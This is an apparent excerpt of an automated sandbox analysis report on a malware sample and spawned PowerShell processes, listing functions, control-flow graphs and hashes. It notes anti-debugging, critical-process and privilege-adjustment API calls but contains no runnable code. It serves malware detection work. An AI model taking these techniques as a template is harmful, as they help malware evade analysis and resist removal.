                                                                        • Opcode Fuzzy Hash: f635b446d5f1db226d68d5488091678d229a77a05716e0135113acc52306f82c
                                                                        • Instruction Fuzzy Hash: 9831FA7191CB4C8FDB18DF9CD846AE97BE0EB99721F00426EE04993252CB747446CB86
                                                                        Function 00007FFD9B7F79E1 Relevance: 1.6, APIs: 1, Instructions: 125COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 485 7ffd9b7f79e1-7ffd9b7f7a9d CheckRemoteDebuggerPresent 488 7ffd9b7f7aa5-7ffd9b7f7ae8 485->488 489 7ffd9b7f7a9f 485->489 489->488
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2890245401.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b7f0000_KJhsNv2RcI.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: f3ff41c4dc2ab4a126fc9d9a4c399fbb1a6ea96d2bbcd4677df66d20cf5c882e
                                                                        • Instruction ID: 173bf5affbc681521cfe13ae18cd72c9230cf9e1bc5038452e5246b6cde28dd5
                                                                        • Opcode Fuzzy Hash: f3ff41c4dc2ab4a126fc9d9a4c399fbb1a6ea96d2bbcd4677df66d20cf5c882e
                                                                        • Instruction Fuzzy Hash: 2F31F23190865C8FCB58DF58C88AAE97BF0FF65321F05426FD489D7292DB34A846CB91
                                                                        Function 00007FFD9B7F9E48 Relevance: 1.0, Instructions: 1040COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 700 7ffd9b7f9e48-7ffd9b7fe355 705 7ffd9b7fe35b-7ffd9b7fe385 700->705 706 7ffd9b7fedcd-7ffd9b7feddb 700->706 709 7ffd9b7fe38b-7ffd9b7fe3a6 705->709 710 7ffd9b7fe687-7ffd9b7fe68a 705->710 709->710 715 7ffd9b7fe3ac-7ffd9b7fe405 709->715 711 7ffd9b7fedc7-7ffd9b7fedcc 710->711 712 7ffd9b7fe690-7ffd9b7fe693 710->712 711->706 712->705 714 7ffd9b7fe699 712->714 714->706 720 7ffd9b7fe40b-7ffd9b7fe45c 715->720 721 7ffd9b7fe69e-7ffd9b7fe777 call 7ffd9b7f0d00 715->721 728 7ffd9b7fe77c-7ffd9b7fe7c3 call 7ffd9b7f0d00 720->728 729 7ffd9b7fe462-7ffd9b7fe4b3 720->729 721->706 750 7ffd9b7fe7c9-7ffd9b7fe7d0 728->750 751 7ffd9b7fe5d6 728->751 739 7ffd9b7fe4b9-7ffd9b7fe50a 729->739 740 7ffd9b7fe925-7ffd9b7fe965 729->740 761 7ffd9b7fe9eb-7ffd9b7fe9f7 739->761 762 7ffd9b7fe510-7ffd9b7fe561 739->762 740->751 765 7ffd9b7fe96b-7ffd9b7fe9a9 740->765 754 7ffd9b7fe7d6-7ffd9b7fe7fd 750->754 755 7ffd9b7fe7d2-7ffd9b7fe7d4 750->755 756 7ffd9b7fe5db-7ffd9b7fe5e1 751->756 758 7ffd9b7fe7ff-7ffd9b7fe870 754->758 755->758 771 7ffd9b7fe5e4-7ffd9b7fe5e7 756->771 758->751 827 7ffd9b7fe876-7ffd9b7fe87d 758->827 761->751 767 7ffd9b7fe9fd-7ffd9b7fea0d 761->767 788 7ffd9b7fe567-7ffd9b7fe5b8 762->788 789 7ffd9b7feade-7ffd9b7feb1e 762->789 795 7ffd9b7fe9b0-7ffd9b7fe9cf 765->795 767->706 782 7ffd9b7fea13-7ffd9b7fea53 767->782 774 7ffd9b7fe673-7ffd9b7fe677 771->774 775 7ffd9b7fe5ed 771->775 774->711 780 7ffd9b7fe67d-7ffd9b7fe681 774->780 781 7ffd9b7febc8-7ffd9b7febcf 775->781 780->710 780->715 781->706 786 7ffd9b7febd5-7ffd9b7fec31 call 7ffd9b7f0d00 781->786 782->751 810 7ffd9b7fea59-7ffd9b7fea73 782->810 786->751 844 7ffd9b7fec37-7ffd9b7fec64 call 7ffd9b7fdf10 786->844 815 7ffd9b7fe5ba-7ffd9b7fe5c6 788->815 816 7ffd9b7fe5f2-7ffd9b7fe607 788->816 789->751 825 7ffd9b7feb24-7ffd9b7feb2b 789->825 812 7ffd9b7fe9d1-7ffd9b7fe9d9 call 7ffd9b7f9e58 795->812 813 7ffd9b7fe9de-7ffd9b7fe9e6 call 7ffd9b7f9e50 795->813 810->751 828 7ffd9b7fea79-7ffd9b7fead9 call 7ffd9b7fdf10 810->828 812->706 813->706 815->751 823 7ffd9b7fe5c8-7ffd9b7fe5cf 815->823 831 7ffd9b7fe649-7ffd9b7fe651 816->831 832 7ffd9b7fe609-7ffd9b7fe643 816->832 823->756 830 7ffd9b7fe5d1-7ffd9b7fe5d4 823->830 833 7ffd9b7feb32-7ffd9b7feb5a 825->833 834 7ffd9b7feb2d-7ffd9b7feb30 825->834 836 7ffd9b7fe884-7ffd9b7fe8ac 827->836 837 7ffd9b7fe87f-7ffd9b7fe882 827->837 828->706 830->771 831->751 835 7ffd9b7fe652-7ffd9b7fe65a 831->835 832->774 864 7ffd9b7fe645-7ffd9b7fe646 832->864 839 7ffd9b7feb5c-7ffd9b7febc3 call 7ffd9b7f9e58 833->839 834->839 840 7ffd9b7fe65c-7ffd9b7fe65f 835->840 841 7ffd9b7fe661-7ffd9b7fe667 835->841 843 7ffd9b7fe8ae-7ffd9b7fe8b9 836->843 837->843 839->706 839->781 849 7ffd9b7fe66a-7ffd9b7fe66d 840->849 841->849 852 7ffd9b7fe8bb-7ffd9b7fe8f1 843->852 853 7ffd9b7fe8f7-7ffd9b7fe8fe 843->853 844->751 881 7ffd9b7fec6a-7ffd9b7fec87 844->881 849->774 855 7ffd9b7fed17-7ffd9b7fed1e 849->855 852->853 869 7ffd9b7fe905-7ffd9b7fe920 call 7ffd9b7fb390 853->869 855->706 861 7ffd9b7fed24-7ffd9b7fedc5 call 7ffd9b7f0d00 call 7ffd9b7f9e50 855->861 861->706 864->831 869->706 881->751 891 7ffd9b7fec8d-7ffd9b7fecaa 881->891 891->751 896 7ffd9b7fecb0-7ffd9b7fed12 call 7ffd9b7f9e50 891->896 896->706
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2890245401.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b7f0000_KJhsNv2RcI.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 38a0e6444e1b1f6c359fed561064b6e04508c012dc3fe2b958d0a5d3027af17c
                                                                        • Instruction ID: 0b20501aabbc015f7116958c210ca3cfa6e1a5011b7b51cb394bfcda66d35d18
                                                                        • Opcode Fuzzy Hash: 38a0e6444e1b1f6c359fed561064b6e04508c012dc3fe2b958d0a5d3027af17c
                                                                        • Instruction Fuzzy Hash: 3D62D830B1CB094BE758FF68886A67977D2FF9C305F51427AE05DC32E6DE28A8414786
                                                                        Function 00007FFD9B7F6026 Relevance: .5, Instructions: 468COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2890245401.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b7f0000_KJhsNv2RcI.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 853d83b59589afe17b6cb770555afba2fa0c90a3c6999099ed66537fdebef811
                                                                        • Instruction ID: b1021de5156ea9529f65ce53fbb7ad2b409fbb7a8d6313127cc9eeb5d30bafd7
                                                                        • Opcode Fuzzy Hash: 853d83b59589afe17b6cb770555afba2fa0c90a3c6999099ed66537fdebef811
                                                                        • Instruction Fuzzy Hash: 97F19330A19A8D8FEBA8DF28C8557E93BD1FF54310F04426EE85DC72A5DB349945CB82
                                                                        Function 00007FFD9B7FE2CA Relevance: .5, Instructions: 455COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2890245401.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b7f0000_KJhsNv2RcI.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 00482093c774c43ba1899f1c2af520c334057831c437acbc0f1b9ed797cad5d6
                                                                        • Instruction ID: 2464955dedfd348be9078fb5de22a9705276409ad8709e07d51325af8a0a9dd9
                                                                        • Opcode Fuzzy Hash: 00482093c774c43ba1899f1c2af520c334057831c437acbc0f1b9ed797cad5d6
                                                                        • Instruction Fuzzy Hash: 6CD10A30B1CB494FE754EF78886A6757BD1FB9D305F0542BEE44DC32A2DE28A8418786
                                                                        Function 00007FFD9B7F6DD2 Relevance: .5, Instructions: 454COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2890245401.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b7f0000_KJhsNv2RcI.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0accea0fd78ce3ccf2db06cc0b34d1983dbfae2742b31491965dbdd220101859
                                                                        • Instruction ID: db5b39ff0cf874e416d9702778324838a4ba0d68f006fa0b0b73bb4971d1f0e0
                                                                        • Opcode Fuzzy Hash: 0accea0fd78ce3ccf2db06cc0b34d1983dbfae2742b31491965dbdd220101859
                                                                        • Instruction Fuzzy Hash: 89E1C630A08A4E8FEBA8DF28C8557E97BD1FF54310F14426EE84DC72A5DE7499418BC1
                                                                        Function 00007FFD9B7F22F1 Relevance: .4, Instructions: 394COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2890245401.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b7f0000_KJhsNv2RcI.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 34290c3fdf56cd486364ccd015c0aad5b09421b11550266890ac9dab6cbe09d8
                                                                        • Instruction ID: 14bc260841877cddbd2156c75638a2a4d14cfdc80d291d662ffc2723ee467252
                                                                        • Opcode Fuzzy Hash: 34290c3fdf56cd486364ccd015c0aad5b09421b11550266890ac9dab6cbe09d8
                                                                        • Instruction Fuzzy Hash: D2C1DA70F1DA0D4FEB98EBA884757797BD1EF98304F450279E05EC32E6DE28A9014785
                                                                        Function 00007FFD9B7F2059 Relevance: .2, Instructions: 201COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2890245401.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b7f0000_KJhsNv2RcI.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0b56979164c945963f31689efa2cc3d99635d1e1b3ed1775e5ae35cc89a1afa2
                                                                        • Instruction ID: 6e85d66840179e518315d6fbcb922d47307f770ec1aa7be43aa39e001c5a4624
                                                                        • Opcode Fuzzy Hash: 0b56979164c945963f31689efa2cc3d99635d1e1b3ed1775e5ae35cc89a1afa2
                                                                        • Instruction Fuzzy Hash: CE510D20B1E6C94FD7A6ABB848746A57FE5DF87219B0801FBE09DC61E7DD081806C386
                                                                        Function 00007FFD9B7F916D Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 465 7ffd9b7f916d-7ffd9b7f9250 RtlSetProcessIsCritical 468 7ffd9b7f9258-7ffd9b7f928d 465->468 469 7ffd9b7f9252 465->469 469->468
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2890245401.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b7f0000_KJhsNv2RcI.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalProcess
                                                                        • String ID:
                                                                        • API String ID: 2695349919-0
                                                                        • Opcode ID: d3f33fe664e0e3ec8e5a938d38d77d5bae133390ecae3d2e2f228d09af6febb2
                                                                        • Instruction ID: b0418e38301b5cd7752e790c66e659e6b25169942e3e60386f956c2aad93e677
                                                                        • Opcode Fuzzy Hash: d3f33fe664e0e3ec8e5a938d38d77d5bae133390ecae3d2e2f228d09af6febb2
                                                                        • Instruction Fuzzy Hash: 1441253190C6588FCB19DF98D855BE9BBF0FF96311F04416EE09AC3592CB74A846CB91
                                                                        Function 00007FFD9BA652D5 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 479 7ffd9ba652d5-7ffd9ba6539a RtlAdjustPrivilege 483 7ffd9ba653a2-7ffd9ba653cf 479->483 484 7ffd9ba6539c 479->484 484->483
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2912954338.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9ba60000_KJhsNv2RcI.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPrivilege
                                                                        • String ID:
                                                                        • API String ID: 3260937286-0
                                                                        • Opcode ID: e953144526610ada4afccbd21642a1bbd9811ce07668ed6d8f6eaf359ee4aa85
                                                                        • Instruction ID: 2d30d31f580642f812d530e4aa655c83e042c881f8a51504641bb8a4475a5622
                                                                        • Opcode Fuzzy Hash: e953144526610ada4afccbd21642a1bbd9811ce07668ed6d8f6eaf359ee4aa85
                                                                        • Instruction Fuzzy Hash: 4D31143190C74C8FDB18DB58D846AE9BBF0EF66711F04426FE08AD3292CB746846CB91

                                                                        Executed Functions

                                                                        Function 00007FFD9B7F644D Relevance: .7, Instructions: 714COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1789514176.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 49a9ab11979669858493e781e885017db15d26a19c91d161a5b1659796abe609
                                                                        • Instruction ID: c32653fcb1f160595322b06e71ee5d961b639b26fe27cc256b72bb09ce8e83cb
                                                                        • Opcode Fuzzy Hash: 49a9ab11979669858493e781e885017db15d26a19c91d161a5b1659796abe609
                                                                        • Instruction Fuzzy Hash: CFD16031B18A4D8FDF94EF58C455AA9BBE1FF68300F15426AD409D72A6CB34E981CBC1
                                                                        Function 00007FFD9B8C6605 Relevance: .4, Instructions: 439COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1790006874.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ecd61ced858b70fa653c82d15b19c36531a089d7a1b81617db96b411ff34080b
                                                                        • Instruction ID: a37114cfb5add390bbe651915dadf0b97c96664fdf07035a8f3b3555d3d0bf8e
                                                                        • Opcode Fuzzy Hash: ecd61ced858b70fa653c82d15b19c36531a089d7a1b81617db96b411ff34080b
                                                                        • Instruction Fuzzy Hash: ACD15AB2B0FA8E4FEB65AB6888759B57BD1EF29314B1901FFD05CC70E3D918A9058341
                                                                        Function 00007FFD9B7FA0D3 Relevance: .3, Instructions: 257COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1789514176.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: abe6582bdb4a44776118ebcf3e70a09abb2265bff2bfa17201e900d2d1329d36
                                                                        • Instruction ID: 88b3379b4dd6f4215cbbe53b3b3df6229454899db5d60cdb5e8e206756030a77
                                                                        • Opcode Fuzzy Hash: abe6582bdb4a44776118ebcf3e70a09abb2265bff2bfa17201e900d2d1329d36
                                                                        • Instruction Fuzzy Hash: 73114F66A0FBCC4FD7539B788C6A0A43FB0EE67211B0A41EBD488CB0B3D5195909C793
                                                                        Function 00007FFD9B8C4073 Relevance: .2, Instructions: 184COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1790006874.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 99ee2212ed3b18f8aa7a7c5cdee2fb5f0b31097cb8b189f375ad3756b539e76d
                                                                        • Instruction ID: cf0e136717efbf16eb6620453e9644ee7108da589517bbfc6db17b4ee33c573a
                                                                        • Opcode Fuzzy Hash: 99ee2212ed3b18f8aa7a7c5cdee2fb5f0b31097cb8b189f375ad3756b539e76d
                                                                        • Instruction Fuzzy Hash: 95512962B0EA8A0FE7E9AB5C542167477D2EF99210B1E00BFD09EC71E7DE15EC458341
                                                                        Function 00007FFD9B8C4370 Relevance: .1, Instructions: 147COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1790006874.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 69734c3d0e35513a46fa7fed271893cb8657df20d7cac2b77779af77fbddabb9
                                                                        • Instruction ID: be8865f22e66dfabd0feb93dd9d4dc786a77acac445b7a75466874e42499902c
                                                                        • Opcode Fuzzy Hash: 69734c3d0e35513a46fa7fed271893cb8657df20d7cac2b77779af77fbddabb9
                                                                        • Instruction Fuzzy Hash: D3410572B0EA890FEBB9E7685421AB877D1EF89220B1D01FFD05DC71A7E915AD448381
                                                                        Function 00007FFD9B6DE380 Relevance: .1, Instructions: 131COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1789050182.00007FFD9B6DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6DD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b6dd000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 21d2171faee2e8cd51cb2728a2e9e8f0d32a634a7ab75c10ecac7cd29064bc0c
                                                                        • Instruction ID: 56efa4d3e75f898375b8b88de42d92542e10a63bc31ac80b2ff6c4769bc5a40f
                                                                        • Opcode Fuzzy Hash: 21d2171faee2e8cd51cb2728a2e9e8f0d32a634a7ab75c10ecac7cd29064bc0c
                                                                        • Instruction Fuzzy Hash: 0C41D67150EBC44FDB668B299C559623FB0EF52314B1B06EFD0C8CB1A3D625B846C792
                                                                        Function 00007FFD9B7F9758 Relevance: .1, Instructions: 131COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1789514176.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2003b8db1d54668f5e9f9d77e638bf5e16f2897232d1f649f92732f13d030b7b
                                                                        • Instruction ID: 24e8fd9eac67c8e72bfd7de3e3cf156cebe1e791296486153f651659747bf9e7
                                                                        • Opcode Fuzzy Hash: 2003b8db1d54668f5e9f9d77e638bf5e16f2897232d1f649f92732f13d030b7b
                                                                        • Instruction Fuzzy Hash: BE311A71A1DB4C4FDB5C9F5C984A6F97BE0FBA9311F00422FE44993262DA30A915CBC6
                                                                        Function 00007FFD9B7FA62C Relevance: .1, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1789514176.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 80a00e86e71423742a6a60cc3874ba8499be0f29d4d0666a294bbd0048a6b498
                                                                        • Instruction ID: 90a3ffaadd0b5c37ad5b0c31f2782a265be32202b1cbd556c34208285892edc4
                                                                        • Opcode Fuzzy Hash: 80a00e86e71423742a6a60cc3874ba8499be0f29d4d0666a294bbd0048a6b498
                                                                        • Instruction Fuzzy Hash: B0210C31A0C74C4FDB59DF9C984A7E97FF0EB96321F04426BD449C3162DA746416CB91
                                                                        Function 00007FFD9B8C40BF Relevance: .1, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1790006874.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eacc5e174461e66afcb3ea1bcdf1b1b836cb22fbcc6832022cb5d12f6d26a9ea
                                                                        • Instruction ID: 038e97fc2e44e6f88850a1b780a54e5da883659569cd12b4c55421048ddce576
                                                                        • Opcode Fuzzy Hash: eacc5e174461e66afcb3ea1bcdf1b1b836cb22fbcc6832022cb5d12f6d26a9ea
                                                                        • Instruction Fuzzy Hash: F221DF62B0EA8B4FE7B5EB58446257466C2EF68210B4E10BFD09EC71E2DE18EC848301
                                                                        Function 00007FFD9B8C43BC Relevance: .1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1790006874.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4f8b684489dcdd64b9866b1a442f911063f6d704d3bebf3056ec465b9b3f12c9
                                                                        • Instruction ID: 6be999dfb34bffbb0f7e89d42e5e8103bf92a0bd77cbc1742cb3b96b2ed027db
                                                                        • Opcode Fuzzy Hash: 4f8b684489dcdd64b9866b1a442f911063f6d704d3bebf3056ec465b9b3f12c9
                                                                        • Instruction Fuzzy Hash: 13119172A0F6894FE7B5E76854749B87AD1EF88220B5E00FBD05DC71A6D915AD808341
                                                                        Function 00007FFD9B7F33B5 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1789514176.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                        • Instruction ID: f015c6d8f1291ae9f9a84129c24d6f916cfece872e45c549876b83854877da12
                                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                        • Instruction Fuzzy Hash: D001A73020CB0C4FD748EF0CE051AA5B7E0FF85360F10056DE58AC36A1DA32E882CB45

                                                                        Non-executed Functions

                                                                        Function 00007FFD9B7F8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1789514176.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: L_^4$L_^7$L_^F$L_^J
                                                                        • API String ID: 0-3225005683
                                                                        • Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                        • Instruction ID: 04a69f08816bc91c8d325c6fadc50cdf1a4162b35631b59aac8caa5ed48679d6
                                                                        • Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                        • Instruction Fuzzy Hash: 022126BBB081654ED305BBBDB8199ED3750CFD423935692F2D2A98B093EE147086CAD0

                                                                        Executed Functions

                                                                        Function 00007FFD9B7E644D Relevance: .7, Instructions: 719COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1895379010.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3487309ab8b26002c9f388b36d96d6b8431b393b61375714c39138032a7c8381
                                                                        • Instruction ID: f90c03aeb680d48c930c6ec07fd866c3558b75cd0e17f14208e99b80cd25cfa1
                                                                        • Opcode Fuzzy Hash: 3487309ab8b26002c9f388b36d96d6b8431b393b61375714c39138032a7c8381
                                                                        • Instruction Fuzzy Hash: CCD16031A18A4D8FDF98DF58C465AAD7BE1FF68300F1542AAD449D72B6CB34E841CB81
                                                                        Function 00007FFD9B8B6605 Relevance: .4, Instructions: 444COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1896140244.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2d36d2fc11528c8825d495596b73e13dfff8ba13e44686d97644e59e2af2f4e9
                                                                        • Instruction ID: 181dddf06fb5a5b7ce55201f0434834935f28ba1f6320da7c7edc10a97491b96
                                                                        • Opcode Fuzzy Hash: 2d36d2fc11528c8825d495596b73e13dfff8ba13e44686d97644e59e2af2f4e9
                                                                        • Instruction Fuzzy Hash: 59D17772A0FADE4FEB65AB7848655B5BBE0EF0A214B0901FED44DC70E3D918E805C781
                                                                        Function 00007FFD9B8B4073 Relevance: .2, Instructions: 184COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1896140244.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
